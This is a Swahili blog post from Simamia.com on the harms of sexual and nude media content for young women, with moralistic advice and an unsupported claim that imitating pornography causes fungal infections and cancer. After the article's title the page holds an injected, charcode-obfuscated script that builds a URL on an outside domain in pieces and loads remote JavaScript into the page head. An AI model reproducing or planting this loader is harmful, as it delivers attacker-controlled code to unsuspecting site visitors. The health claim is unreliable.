Habari za muda huu msomaji wa Simamia.com natumai uko vyema sana, leo nataka nikujuze kitu. Kwa sasa matumizi ya maudhui ya ngono na utupu yametaradadi sana katika vyombo mbalimbali vya habari, siku hizi huwezi kuta video ya mziki au filamu bila taswira ya ngono au picha za utupu katika kazi hizo.
Kiuhalisia vyombo vya habari na wauzaji wa maudhui mbalimbali hulenga hasa faida na mauzo makubwa ya kazi zao, hivyo hutumia sana ngono na utupu ili kukonga watazamaji na wateja wao, yaani kwasasa hata matangazo ya biashara hutumia viashiria vya ngono na utupu kupitia picha, sauti na hata maneno yenye viashiria vya ngono.
Mara nyingi mwanamke amekuwa akitumika haswa katika nyanja hii hususani kimavazi na hats matendo ambapo asilimia kubwa ya maudhui ya sasa mwanamke huwepo na hutumika Sana kuashiria ngono au utupu na huku waandaji wa maudhui hulenga vijana ili kuwauzia maudhui hayo kwa kuwa ndiyo hupendelea kuyatazama. Lakini kitu hiki huwaathiri sana vijana hasa hawa vijana wa kike.
Baadhi ya nchi huzalisha maudhui ya ngono kabisa yani picha na video za ngono ambapo mara nyingi wanawake wamekuwa wakitumika kuonesha mambo machafu mengi sana hali inayoiathiri jamii na wanawake kwa ujumla hususani vijana miongoni mwa nchi hizo ni Marekani, Urusi, Korea kusini, Japan,India na zinginezo nyingi.
Vijana wengi wa kike huiga michezo mbalimbali pia tabia mbalimbali kutoka kwenye maudhui hayo yanayotolewa na vyombo tofautitofauti vya habari hasa mitandao na kuyafanya kama sehemu ya maisha yao.
Madhara kadha wa kadha ya maudhui ya ngono na utupu kwa vijana wa kike;
Hupelekea madhara ya kiafya, wasichana wengi hupata magonja mbalimbali kutokana na kuiga michezo ya kwenye video za ngono na kupelekea kupata fangasi na hata saratani.
Kumomonyoka kwa maadili, Wanawake wengi huiga namna ya kuvaa, na matendo mbalimbali ambapo kutokana na hali hii hupelekea kuharibika kitabia na kufanya vitendo viovu kwasababu ya kuona maudhui ya ngono na picha za utupu.
Kudharauliwa kwa mwanamke, pia wanawake huonekana dhaifu na chombo cha starehe kutokana na maudhui mbalimbali yanavyomuonesha kutokana na imani hiyo inapelekea mwanamke kutopewa heshima katika jamii.
Hayo ni baadhi tu ya madhara ya suala hili kwa maana hiyo madhara ni mengi sana hivyo basi ningependa kushauri vyombo vya habari kupunguza maudhui za ngono na utupu na vijana pia tusipendelee sana maudhui hizi wakati wa ujana ni wa kufanya kazi na kujiendeleza hivyo basi tuikite kutafuta maendeleo na siyo ngono TUJITAHIDI KUIZUIA MIILI YETU!!.
Madhara ya Maudhui ya Ngono na Utupu kwa Vijana wa Kike
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Recent Comments